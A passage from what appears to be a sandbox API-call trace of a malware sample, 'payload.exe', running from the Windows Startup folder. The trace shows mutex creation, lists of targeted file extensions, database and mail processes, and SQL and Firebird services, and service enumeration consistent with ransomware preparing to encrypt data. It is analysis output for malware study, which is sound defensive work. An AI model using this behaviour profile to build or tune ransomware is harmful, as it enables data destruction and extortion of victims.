(Heap=0x280000, Flags=0x0, Ptr=0x290d48, Size=0x20) returned 0x294290 [0258.360] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x294290, Size=0x40) returned 0x294828 [0258.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xfffe) returned 0x294aa0 [0258.360] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_0ZI89UA") returned 0x84 [0258.360] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x283828 | out: hHeap=0x280000) returned 1 [0258.360] lstrlenW (lpString="Global\\syncronize_") returned 18 [0258.361] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294828 | out: hHeap=0x280000) returned 1 [0258.361] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x7) returned 0x283828 [0258.361] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x10) returned 0x290d48 [0258.361] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x290d48, Size=0x20) returned 0x294290 [0258.361] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x294290, Size=0x40) returned 0x294828 [0258.361] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xfffe) returned 0x2a4aa8 [0258.361] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_0ZI89UU") returned 0x88 [0258.361] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x283828 | out: hHeap=0x280000) returned 1 [0258.361] lstrlenW (lpString="Global\\syncronize_") returned 18 [0258.361] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294828 | out: hHeap=0x280000) returned 1 [0258.361] GetVersion () returned 0x1db10106 [0258.361] GetCurrentProcess () returned 0xffffffff [0258.361] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0258.361] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0258.361] CloseHandle (hObject=0x8c) returned 1 [0258.361] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x102 [0258.361] ExitProcess (uExitCode=0x0) Process: id = "8" image_name = "payload.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe" page_root = "0xd223000" os_pid = "0x53c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e656" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x540 [0257.434] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76890000 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetProcAddress") returned 0x768a1222 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetModuleHandleW") returned 0x768a34b0 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="FindNextFileW") returned 0x768a54ee [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="FindClose") returned 0x768a4442 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="MoveFileW") returned 0x768b9af0 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetFileSizeEx") returned 0x768a59e2 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetModuleFileNameW") returned 0x768a4950 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetFileAttributesW") returned 0x768a1b18 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="ExitProcess") returned 0x768a7a10 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetCommandLineW") returned 0x768a5223 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetComputerNameW") returned 0x768add0e [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetComputerNameA") returned 0x768bb6e0 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="CreateMutexW") returned 0x768a424c [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="lstrlenW") returned 0x768a1700 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="lstrlenA") returned 0x768a5a4b [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="GetCurrentProcess") returned 0x768a1809 [0257.435] GetProcAddress (hModule=0x76890000, lpProcName="WaitForSingleObject") returned 0x768a1136 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="GetLogicalDrives") returned 0x768a5371 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="GetTickCount") returned 0x768a110c [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="DeleteFileW") returned 0x768a89b3 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="WideCharToMultiByte") returned 0x768a170d [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x768a1916 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="Sleep") returned 0x768a10ff [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="LeaveCriticalSection") returned 0x779c2270 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="ReadFile") returned 0x768a3ed3 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="CreateFileW") returned 0x768a3f5c [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="OpenMutexW") returned 0x768a5151 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="EnterCriticalSection") returned 0x779c22b0 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="WaitForMultipleObjects") returned 0x768a4220 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="lstrcmpiW") returned 0x768bd5cd [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="lstrcmpiA") returned 0x768a3e8e [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="DeleteCriticalSection") returned 0x779d45f5 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="ReleaseMutex") returned 0x768a111e [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="CloseHandle") returned 0x768a1410 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="GetVersion") returned 0x768a4467 [0257.436] GetProcAddress (hModule=0x76890000, lpProcName="CreateThread") returned 0x768a34d5 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="ExpandEnvironmentStringsW") returned 0x768a4173 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="QueryPerformanceCounter") returned 0x768a1725 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="QueryPerformanceFrequency") returned 0x768a41f0 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="GetCurrentProcessId") returned 0x768a11f8 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="SetFileAttributesW") returned 0x768bd4f7 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="GetVolumeInformationW") returned 0x768bc860 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="WriteFile") returned 0x768a1282 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="SetFilePointerEx") returned 0x768bc807 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="SetEndOfFile") returned 0x768bce2e [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="FindFirstFileW") returned 0x768a4435 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="GetProcessHeap") returned 0x768a14e9 [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="HeapReAlloc") returned 0x779e1f6e [0257.437] GetProcAddress (hModule=0x76890000, lpProcName="HeapAlloc") returned 0x779ce026 [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="HeapFree") returned 0x768a14c9 [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="CreatePipe") returned 0x7692415b [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="SetHandleInformation") returned 0x768b195c [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="CreateProcessW") returned 0x768a103d [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="CompareStringW") returned 0x768a3bca [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="CompareStringA") returned 0x768a3c5a [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="OpenProcess") returned 0x768a1986 [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="TerminateProcess") returned 0x768bd802 [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="GetSystemTime") returned 0x768a5a96 [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="SystemTimeToFileTime") returned 0x768a5a7e [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="GetLastError") returned 0x768a11c0 [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="CreateToolhelp32Snapshot") returned 0x768c735f [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="Process32NextW") returned 0x768c896c [0257.438] GetProcAddress (hModule=0x76890000, lpProcName="Process32FirstW") returned 0x768c8baf [0257.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76ee0000 [0257.687] GetProcAddress (hModule=0x76ee0000, lpProcName="RegOpenKeyExW") returned 0x76ef468d [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="RegQueryValueExW") returned 0x76ef46ad [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="RegSetValueExW") returned 0x76ef14d6 [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="RegCloseKey") returned 0x76ef469d [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="OpenProcessToken") returned 0x76ef4304 [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="GetTokenInformation") returned 0x76ef431c [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="OpenSCManagerW") returned 0x76eeca64 [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="OpenServiceW") returned 0x76eeca4c [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="CloseServiceHandle") returned 0x76ef369c [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="ControlService") returned 0x76f07144 [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="QueryServiceStatus") returned 0x76ef2a86 [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="EnumDependentServicesW") returned 0x76ee1e3a [0257.688] GetProcAddress (hModule=0x76ee0000, lpProcName="EnumServicesStatusExW") returned 0x76eeb466 [0257.688] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76640000 [0257.696] GetProcAddress (hModule=0x76640000, lpProcName="SystemParametersInfoW") returned 0x766590d3 [0257.696] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75690000 [0257.699] GetProcAddress (hModule=0x75690000, lpProcName="ShellExecuteExW") returned 0x756b1e46 [0257.699] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779a0000 [0257.699] GetProcAddress (hModule=0x779a0000, lpProcName="NtQuerySystemInformation") returned 0x779bfda0 [0257.699] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x73cd0000 [0258.297] GetProcAddress (hModule=0x73cd0000, lpProcName="WNetCloseEnum") returned 0x73cd2dd6 [0258.297] GetProcAddress (hModule=0x73cd0000, lpProcName="WNetOpenEnumW") returned 0x73cd2f06 [0258.297] GetProcAddress (hModule=0x73cd0000, lpProcName="WNetEnumResourceW") returned 0x73cd3058 [0258.297] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76f80000 [0258.322] GetProcAddress (hModule=0x76f80000, lpProcName="WSAStartup") returned 0x76f83ab2 [0258.322] GetProcAddress (hModule=0x76f80000, lpProcName="socket") returned 0x76f83eb8 [0258.322] GetProcAddress (hModule=0x76f80000, lpProcName="send") returned 0x76f86f01 [0258.322] GetProcAddress (hModule=0x76f80000, lpProcName="recv") returned 0x76f86b0e [0258.322] GetProcAddress (hModule=0x76f80000, lpProcName="connect") returned 0x76f86bdd [0258.323] GetProcAddress (hModule=0x76f80000, lpProcName="closesocket") returned 0x76f83918 [0258.323] GetProcAddress (hModule=0x76f80000, lpProcName="gethostbyname") returned 0x76f97673 [0258.323] GetProcAddress (hModule=0x76f80000, lpProcName="inet_addr") returned 0x76f8311b [0258.323] GetProcAddress (hModule=0x76f80000, lpProcName="ntohl") returned 0x76f82d57 [0258.323] GetProcAddress (hModule=0x76f80000, lpProcName="htonl") returned 0x76f82d57 [0258.323] GetProcAddress (hModule=0x76f80000, lpProcName="htons") returned 0x76f82d8b [0258.323] GetProcessHeap () returned 0x520000 [0258.323] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x534370 [0258.323] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=6761024555) returned 1 [0258.323] GetTickCount () returned 0x5ef0 [0258.323] GetCurrentProcessId () returned 0x53c [0258.323] GetTickCount () returned 0x5ef0 [0258.323] GetTickCount () returned 0x5ef0 [0258.323] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x534398 [0258.323] GetVersion () returned 0x1db10106 [0258.323] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x7) returned 0x523980 [0258.323] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x530ea0 [0258.323] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530ea0, Size=0x20) returned 0x5343e8 [0258.324] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5343e8, Size=0x40) returned 0x534980 [0258.324] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x534c30 [0258.324] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_0ZI89UA") returned 0x0 [0258.324] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_0ZI89UA") returned 0x84 [0258.324] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x523980 | out: hHeap=0x520000) returned 1 [0258.324] lstrlenW (lpString="Global\\syncronize_") returned 18 [0258.324] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534980 | out: hHeap=0x520000) returned 1 [0258.324] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x7) returned 0x523980 [0258.324] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x530ea0 [0258.324] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530ea0, Size=0x20) returned 0x5343e8 [0258.324] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5343e8, Size=0x40) returned 0x534980 [0258.324] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x544c38 [0258.324] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_0ZI89UU") returned 0x0 [0258.324] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_0ZI89UU") returned 0x88 [0258.324] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x523980 | out: hHeap=0x520000) returned 1 [0258.324] lstrlenW (lpString="Global\\syncronize_") returned 18 [0258.324] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534980 | out: hHeap=0x520000) returned 1 [0258.324] GetVersion () returned 0x1db10106 [0258.324] GetCurrentProcess () returned 0xffffffff [0258.324] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0258.324] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0258.324] CloseHandle (hObject=0x8c) returned 1 [0258.325] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x523980 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x530ea0 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530ea0, Size=0x20) returned 0x5343e8 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5343e8, Size=0x40) returned 0x534980 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534980, Size=0x80) returned 0x534980 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534980, Size=0x100) returned 0x534980 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x34) returned 0x534a88 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x530a90 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x530aa0 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x530ab0 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x530ea0 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x534ac8 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x530eb8 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534ac8, Size=0x8) returned 0x534ac8 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x530ed0 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534ac8, Size=0x10) returned 0x534ac8 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x530ee8 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x530f00 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534ac8, Size=0x20) returned 0x534ac8 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x530f18 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x530f30 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530a90, Size=0x8) returned 0x530a90 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530aa0, Size=0x8) returned 0x530aa0 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x534af0 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x530f48 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x534b00 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x530f60 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534b00, Size=0x8) returned 0x534b00 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554c58 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534b00, Size=0x10) returned 0x534b00 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554c70 [0258.325] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x534b18 [0258.325] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534b00, Size=0x20) returned 0x534b28 [0258.326] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530a90, Size=0x10) returned 0x534b00 [0258.326] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530aa0, Size=0x10) returned 0x534b50 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x530a90 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554c88 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x530aa0 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554ca0 [0258.326] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x530aa0, Size=0x8) returned 0x530aa0 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x534b68 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554cb8 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x534b78 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554cd0 [0258.326] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534b78, Size=0x8) returned 0x534b78 [0258.326] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534b00, Size=0x20) returned 0x534b88 [0258.326] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534b50, Size=0x20) returned 0x534bb0 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x534b50 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554ce8 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x534bd8 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554d00 [0258.326] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534bd8, Size=0x8) returned 0x534bd8 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x555040 [0258.326] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x555060 [0258.326] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0258.326] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534980 | out: hHeap=0x520000) returned 1 [0258.329] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fdf0 | out: lpWSAData=0x18fdf0) returned 0 [0258.331] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d30 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d30, Size=0x20) returned 0x5345f0 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5345f0, Size=0x40) returned 0x559260 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559260, Size=0x80) returned 0x559260 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559260, Size=0x100) returned 0x559260 [0258.331] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d30 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d30, Size=0x20) returned 0x5345f0 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5345f0, Size=0x40) returned 0x559368 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559368, Size=0x80) returned 0x559368 [0258.331] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559368, Size=0x100) returned 0x559368 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554d30 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x559470 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0258.332] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559470, Size=0x8) returned 0x559470 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x559480 [0258.332] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559470, Size=0x10) returned 0x5594a0 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x5594b8 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x5345f0 [0258.332] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5594a0, Size=0x20) returned 0x5594d8 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c) returned 0x534618 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x559500 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x534640 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554d60 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x559470 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x559520 [0258.332] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559470, Size=0x8) returned 0x559470 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x3c) returned 0x559568 [0258.332] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559470, Size=0x10) returned 0x5594a0 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x5595b0 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x5595d0 [0258.332] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5594a0, Size=0x20) returned 0x5595f0 [0258.332] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x24) returned 0x559618 [0258.332] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0258.332] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559260 | out: hHeap=0x520000) returned 1 [0258.332] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0258.332] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559368 | out: hHeap=0x520000) returned 1 [0258.332] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x559b70 [0258.631] EnumServicesStatusExW (in: hSCManager=0x559b70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 0 [0258.667] GetLastError () returned 0xea [0258.667] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa08) returned 0x55d450 [0258.667] EnumServicesStatusExW (in: hSCManager=0x559b70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x55d450, cbBufSize=0xa08, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x55d450, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 1 [0259.934] CloseServiceHandle (hSCObject=0x559b70) returned 1 [0260.194] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0260.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0260.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0260.194] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0260.194] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0260.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0260.194] lstrlenW (lpString="AudioSrv") returned 8 [0260.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0260.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0260.194] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0260.194] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0260.194] 